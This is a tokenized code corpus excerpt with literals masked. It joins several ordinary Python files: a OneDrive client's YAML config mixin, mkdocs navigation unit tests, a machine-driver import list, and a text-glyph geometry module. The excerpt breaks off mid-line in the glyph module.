<s> from __future__ import unicode_literals , print_function <EOL> import itertools as it , operator as op , functools as ft <EOL> import os , sys , io , errno , tempfile , stat , re <EOL> from os . path import dirname , basename <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> class ConfigMixin ( object ) : <EOL> conf_path_default = b'<STR_LIT>' <EOL> conf_save = False <EOL> conf_raise_structure_errors = False <EOL> conf_update_keys = dict ( <EOL> client = { '<STR_LIT:id>' , '<STR_LIT>' } , <EOL> auth = { '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } , <EOL> request = { '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } ) <EOL> def __init__ ( self , ** kwz ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def from_conf ( cls , path = None , ** overrides ) : <EOL> '''<STR_LIT>''' <EOL> from onedrive import portalocker <EOL> import yaml <EOL> if path is None : <EOL> path = cls . conf_path_default <EOL> log . debug ( '<STR_LIT>' , path ) <EOL> path = os . path . expanduser ( path ) <EOL> with open ( path , '<STR_LIT:rb>' ) as src : <EOL> portalocker . lock ( src , portalocker . LOCK_SH ) <EOL> yaml_str = src . read ( ) <EOL> portalocker . unlock ( src ) <EOL> conf = yaml . safe_load ( yaml_str ) <EOL> conf . setdefault ( '<STR_LIT>' , path ) <EOL> conf_cls = dict ( ) <EOL> for ns , keys in cls . conf_update_keys . viewitems ( ) : <EOL> for k in keys : <EOL> try : <EOL> v = conf . get ( ns , dict ( ) ) . get ( k ) <EOL> except AttributeError : <EOL> if not cls . conf_raise_structure_errors : raise <EOL> raise KeyError ( ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( ns = ns , k = k , path = path ) ) <EOL> if v is not None : conf_cls [ '<STR_LIT>' . format ( ns , k ) ] = conf [ ns ] [ k ] <EOL> conf_cls . update ( overrides ) <EOL> if isinstance ( conf . get ( '<STR_LIT>' , dict ( ) ) . get ( '<STR_LIT:id>' ) , ( int , long ) ) : <EOL> log . 
warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , path ) <EOL> cid = conf [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> if not re . search ( r'<STR_LIT>' . format ( cid ) , yaml_str ) and re . search ( r'<STR_LIT>' . format ( cid ) , yaml_str ) : <EOL> cid = int ( '<STR_LIT>' . format ( cid ) ) <EOL> conf [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] = '<STR_LIT>' . format ( cid ) <EOL> self = cls ( ** conf_cls ) <EOL> self . conf_save = conf [ '<STR_LIT>' ] <EOL> return self <EOL> def sync ( self ) : <EOL> if not self . conf_save : return <EOL> from onedrive import portalocker <EOL> import yaml <EOL> retry = False <EOL> with open ( self . conf_save , '<STR_LIT>' ) as src : <EOL> portalocker . lock ( src , portalocker . LOCK_SH ) <EOL> conf_raw = src . read ( ) <EOL> conf = yaml . safe_load ( io . BytesIO ( conf_raw ) ) if conf_raw else dict ( ) <EOL> portalocker . unlock ( src ) <EOL> conf_updated = False <EOL> for ns , keys in self . conf_update_keys . viewitems ( ) : <EOL> for k in keys : <EOL> v = getattr ( self , '<STR_LIT>' . format ( ns , k ) , None ) <EOL> if isinstance ( v , unicode ) : v = v . encode ( '<STR_LIT:utf-8>' ) <EOL> if v != conf . get ( ns , dict ( ) ) . get ( k ) : <EOL> conf . setdefault ( ns , dict ( ) ) [ k ] = v <EOL> conf_updated = True <EOL> if conf_updated : <EOL> log . debug ( '<STR_LIT>' , src . name ) <EOL> conf_new = yaml . safe_dump ( conf , default_flow_style = False ) <EOL> if os . name == '<STR_LIT>' : <EOL> portalocker . lock ( src , portalocker . LOCK_EX ) <EOL> src . seek ( <NUM_LIT:0> ) <EOL> if src . read ( ) != conf_raw : retry = True <EOL> else : <EOL> src . seek ( <NUM_LIT:0> ) <EOL> src . truncate ( ) <EOL> src . write ( conf_new ) <EOL> src . flush ( ) <EOL> portalocker . unlock ( src ) <EOL> else : <EOL> with tempfile . NamedTemporaryFile ( <EOL> prefix = '<STR_LIT>' . format ( basename ( self . conf_save ) ) , <EOL> dir = dirname ( self . conf_save ) , delete = False ) as tmp : <EOL> try : <EOL> portalocker . 
lock ( src , portalocker . LOCK_EX ) <EOL> src . seek ( <NUM_LIT:0> ) <EOL> if src . read ( ) != conf_raw : retry = True <EOL> else : <EOL> portalocker . lock ( tmp , portalocker . LOCK_EX ) <EOL> tmp . write ( conf_new ) <EOL> os . fchmod ( tmp . fileno ( ) , stat . S_IMODE ( os . fstat ( src . fileno ( ) ) . st_mode ) ) <EOL> os . rename ( tmp . name , src . name ) <EOL> src . seek ( <NUM_LIT:0> ) <EOL> src . truncate ( ) <EOL> src . write ( conf_new ) <EOL> finally : <EOL> try : os . unlink ( tmp . name ) <EOL> except OSError : pass <EOL> if retry : <EOL> log . debug ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , self . conf_save ) <EOL> return self . sync ( ) </s>
<s> from __future__ import unicode_literals <EOL> import mock <EOL> import os <EOL> import unittest <EOL> from mkdocs import nav , legacy <EOL> from mkdocs . exceptions import ConfigurationError <EOL> from mkdocs . tests . base import dedent <EOL> class SiteNavigationTests ( unittest . TestCase ) : <EOL> def test_simple_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:2> ) <EOL> def test_empty_toc_item ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:2> ) <EOL> def test_indented_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] } <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . 
pages ) , <NUM_LIT:6> ) <EOL> def test_nested_ungrouped ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:3> ) <EOL> def test_nested_ungrouped_no_titles ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:3> ) <EOL> @ mock . patch . object ( os . path , '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> def test_nested_ungrouped_no_titles_windows ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:3> ) <EOL> def test_walk_simple_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . 
strip ( ) , expected [ index ] ) <EOL> def test_walk_empty_toc ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_indented_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] } <EOL> ] <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_base_url ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages , use_directory_urls = False ) <EOL> base_url = site_navigation . url_context . make_relative ( '<STR_LIT:/>' ) <EOL> self . assertEqual ( base_url , '<STR_LIT:.>' ) <EOL> def test_relative_md_links_have_slash ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages , use_directory_urls = False ) <EOL> site_navigation . url_context . base_path = "<STR_LIT>" <EOL> url = site_navigation . url_context . make_relative ( '<STR_LIT>' ) <EOL> self . 
assertEqual ( url , '<STR_LIT>' ) <EOL> def test_generate_site_navigation ( self ) : <EOL> """<STR_LIT>""" <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> url_context = nav . URLContext ( ) <EOL> nav_items , pages = nav . _generate_site_navigation ( pages , url_context ) <EOL> self . assertEqual ( [ n . title for n in nav_items ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ p . title for p in pages ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ mock . patch . object ( os . path , '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> def test_generate_site_navigation_windows ( self ) : <EOL> """<STR_LIT>""" <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> url_context = nav . URLContext ( ) <EOL> nav_items , pages = nav . _generate_site_navigation ( pages , url_context ) <EOL> self . assertEqual ( [ n . title for n in nav_items ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ p . title for p in pages ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_invalid_pages_config ( self ) : <EOL> bad_pages = [ <EOL> set ( ) , <EOL> { "<STR_LIT:a>" : "<STR_LIT>" , "<STR_LIT:b>" : "<STR_LIT>" } <EOL> ] <EOL> for bad_page in bad_pages : <EOL> def _test ( ) : <EOL> return nav . _generate_site_navigation ( ( bad_page , ) , None ) <EOL> self . assertRaises ( ConfigurationError , _test ) <EOL> def test_pages_config ( self ) : <EOL> bad_page = { } <EOL> def _test ( ) : <EOL> return nav . _generate_site_navigation ( ( bad_page , ) , None ) <EOL> self . 
assertRaises ( ConfigurationError , _test ) <EOL> def test_ancestors ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] } <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> ancestors = ( <EOL> [ ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] , <EOL> site_navigation . pages [ <NUM_LIT:4> ] . ancestors [ - <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:2> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:2> ] ] , <EOL> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , len ( ancestors ) ) <EOL> for i , ( page , expected_ancestor ) in enumerate ( <EOL> zip ( site_navigation . pages , ancestors ) ) : <EOL> self . assertEqual ( page . ancestors , expected_ancestor , <EOL> "<STR_LIT>" . format ( i ) ) <EOL> def test_nesting ( self ) : <EOL> pages_config = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } <EOL> ] <EOL> site_navigation = nav . 
SiteNavigation ( pages_config ) <EOL> self . assertEqual ( [ n . title for n in site_navigation . nav_items ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:12> ) <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> self . maxDiff = None <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> class TestLegacyPagesConfig ( unittest . TestCase ) : <EOL> def test_walk_simple_toc ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_empty_toc ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_indented_toc ( self ) : <EOL> pages = legacy . 
pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_indented_toc_missing_child_title ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:6> ) </s>
<s> """<STR_LIT>""" <EOL> import modela , epilog , universal , null , shopbot , gcode , shopbot5 <EOL> MACHINES = [ null , modela , epilog , universal , shopbot , gcode , shopbot5 ] </s>
<s> from koko . lib . shapes2d import * <EOL> def text ( text , x , y , height = <NUM_LIT:1> , align = '<STR_LIT>' ) : <EOL> dx , dy = <NUM_LIT:0> , - <NUM_LIT:1> <EOL> text_shape = None <EOL> for line in text . split ( '<STR_LIT:\n>' ) : <EOL> line_shape = None <EOL> for c in line : <EOL> if not c in _glyphs . keys ( ) : <EOL> print '<STR_LIT>' % c <EOL> else : <EOL> chr_math = move ( _glyphs [ c ] , dx , dy ) <EOL> if line_shape is None : line_shape = chr_math <EOL> else : line_shape += chr_math <EOL> dx += _glyphs [ c ] . width + <NUM_LIT:0.1> <EOL> dx -= <NUM_LIT:0.1> <EOL> if line_shape is not None : <EOL> if align [ <NUM_LIT:0> ] == '<STR_LIT:L>' : <EOL> pass <EOL> elif align [ <NUM_LIT:0> ] == '<STR_LIT:C>' : <EOL> line_shape = move ( line_shape , - dx / <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> elif align [ <NUM_LIT:0> ] == '<STR_LIT:R>' : <EOL> line_shape = move ( line_shape , - dx , <NUM_LIT:0> ) <EOL> text_shape += line_shape <EOL> dy -= <NUM_LIT> <EOL> dx = <NUM_LIT:0> <EOL> dy += <NUM_LIT> <EOL> if text_shape is None : return None <EOL> if align [ <NUM_LIT:1> ] == '<STR_LIT:T>' : <EOL> pass <EOL> elif align [ <NUM_LIT:1> ] == '<STR_LIT:B>' : <EOL> text_shape = move ( text_shape , <NUM_LIT:0> , - dy , ) <EOL> elif align [ <NUM_LIT:1> ] == '<STR_LIT:C>' : <EOL> text_shape = move ( text_shape , <NUM_LIT:0> , - dy / <NUM_LIT:2> ) <EOL> if height != <NUM_LIT:1> : <EOL> text_shape = scale_xy ( text_shape , <NUM_LIT:0> , <NUM_LIT:0> , height ) <EOL> dx *= height <EOL> dy *= height <EOL> return move ( text_shape , x , y ) <EOL> _glyphs = { } <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> 
shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:A>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = shear_x_y ( shape , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape = move ( shape , - <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:a>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:B>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) + rectangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:b>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT:0.5> ) <EOL> shape -= rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:C>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:c>' ] = shape <EOL> shape = circle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) - circle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:D>' ] = shape <EOL> shape = reflect_x ( _glyphs [ '<STR_LIT:b>' ] , _glyphs [ '<STR_LIT:b>' ] . width / <NUM_LIT:2> ) <EOL> shape . width = _glyphs [ '<STR_LIT:b>' ] . width <EOL> _glyphs [ '<STR_LIT:d>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:E>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:e>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:F>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:f>' ] = shape <EOL> shape = circle ( 